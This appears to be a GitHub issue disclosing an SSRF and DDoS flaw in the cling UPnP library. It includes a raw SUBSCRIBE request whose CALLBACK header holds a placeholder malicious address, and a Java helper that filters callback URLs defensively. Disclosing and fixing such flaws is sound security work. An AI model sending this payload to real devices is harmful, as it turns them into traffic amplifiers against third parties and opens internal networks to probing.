SSRF and DDOS vulnerability #253

Open
@YYHYlh

Description

The UPnP protocol implemented in the latest version of cling has a flaw: the CALLBACK parameter in the request header of a service's SUBSCRIBE request is not checked. An attacker can use this flaw to send malicious data to a device developed using cling, which causes the device to send a large amount of data to an IP address specified by the attacker, implementing a DDoS attack; at the same time, the vulnerability can be used to implement an SSRF attack on the intranet.

The payload is:

```
SUBSCRIBE / HTTP/1.1
Host: localhost:9999
Accept-Encoding: identity
User-Agent: Callstranger Vulnerability Checker
CALLBACK: <Malicious address>
TIMEOUT: Second-300
NT: upnp:event
Content-Length: 0
```
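
One way a UPnP stack could check the CALLBACK header before accepting a subscription, as an added example that is not part of the original issue and is not cling's code. It assumes a policy of accepting only HTTP delivery URLs whose host is an IP literal equal to the source address of the SUBSCRIBE request; the class and method names are hypothetical and the addresses are constructed.

```java
import java.net.InetAddress;
import java.net.URI;
import java.net.UnknownHostException;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Hypothetical helper, not part of cling: filters the delivery URLs of a SUBSCRIBE request.
public class CallbackFilter {
    // Each delivery URL in a CALLBACK header is wrapped in angle brackets.
    private static final Pattern URL_IN_BRACKETS = Pattern.compile("<([^<>\\s]+)>");
    private static final Pattern IPV4_LITERAL = Pattern.compile("\\d{1,3}(\\.\\d{1,3}){3}");

    /** Returns only the callback URLs that point back at the subscriber itself. */
    static List<URI> allowedCallbacks(String callbackHeader, InetAddress subscriber) {
        List<URI> allowed = new ArrayList<>();
        if (callbackHeader == null) return allowed;
        Matcher m = URL_IN_BRACKETS.matcher(callbackHeader);
        while (m.find()) {
            try {
                URI uri = URI.create(m.group(1));
                String host = uri.getHost();
                // Event notifications are sent over plain HTTP; drop every other scheme.
                if (!"http".equalsIgnoreCase(uri.getScheme()) || host == null) continue;
                // Accept IP literals only, so the header cannot trigger a DNS lookup.
                boolean literal = host.startsWith("[") || IPV4_LITERAL.matcher(host).matches();
                // Assumed policy: the callback must target the address the request came from.
                if (literal && InetAddress.getByName(host).equals(subscriber)) allowed.add(uri);
            } catch (IllegalArgumentException | UnknownHostException e) {
                // Malformed URL or address: drop this entry and keep checking the rest.
            }
        }
        return allowed;
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample: the TCP peer address of the SUBSCRIBE request.
        InetAddress subscriber = InetAddress.getByName("192.0.2.10");
        // Constructed header: own address, third-party address, hostname, non-HTTP scheme.
        String header = "<http://192.0.2.10:8080/event> <http://198.51.100.7/> "
                + "<http://internal.example/admin> <ftp://192.0.2.10/x>";
        List<URI> ok = allowedCallbacks(header, subscriber);
        System.out.println("accepted callbacks: " + ok);
        if (ok.isEmpty()) System.out.println("no acceptable callback: reject the SUBSCRIBE");
    }
}
```

A subscription would be created only for the URLs this method returns, and refused when the list is empty.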
